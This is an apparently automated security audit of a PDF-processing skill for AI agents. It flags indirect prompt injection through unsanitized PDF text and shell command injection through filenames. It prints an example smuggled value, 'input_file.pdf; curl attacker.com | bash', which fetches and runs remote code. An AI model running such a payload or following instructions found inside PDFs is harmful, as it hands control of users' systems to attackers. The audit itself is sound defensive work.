Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (PROMPT_INJECTION, COMMAND_EXECUTION)
Full Analysis
- PROMPT_INJECTION (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8).
  - Ingestion points: PDF files are read using pypdf, pdfplumber, and pytesseract (SKILL.md).
  - Boundary markers: Absent. There are no instructions or delimiters to isolate the content of the PDF from the agent's instruction set.
  - Capability inventory: The skill allows local file writing, command-line execution (qpdf, pdftk), and text extraction that feeds directly into the agent's reasoning loop.
  - Sanitization: Absent. There is no logic provided to filter or escape instructions that may be found within the PDF text or metadata.
- COMMAND_EXECUTION (HIGH): The skill documentation provides examples of shell command execution for PDF manipulation.
  - Evidence: Use of pdftotext, qpdf, pdftk, and pdfimages via shell commands (SKILL.md).
  - Risk: If the agent dynamically constructs these commands using filenames or metadata extracted from untrusted PDFs without strict sanitization, an attacker could achieve arbitrary command execution via shell metacharacters (e.g., input_file.pdf; curl attacker.com | bash).
- EXTERNAL_DOWNLOADS (LOW): The skill references several external Python dependencies.
  - Evidence: References to pypdf, pdfplumber, pandas, reportlab, pytesseract, and pdf2image.
  - Status: These are well-known, legitimate packages, making the risk low, but their presence defines the attack surface for the Indirect Prompt Injection findings above.
Recommendations
- AI detected serious security threats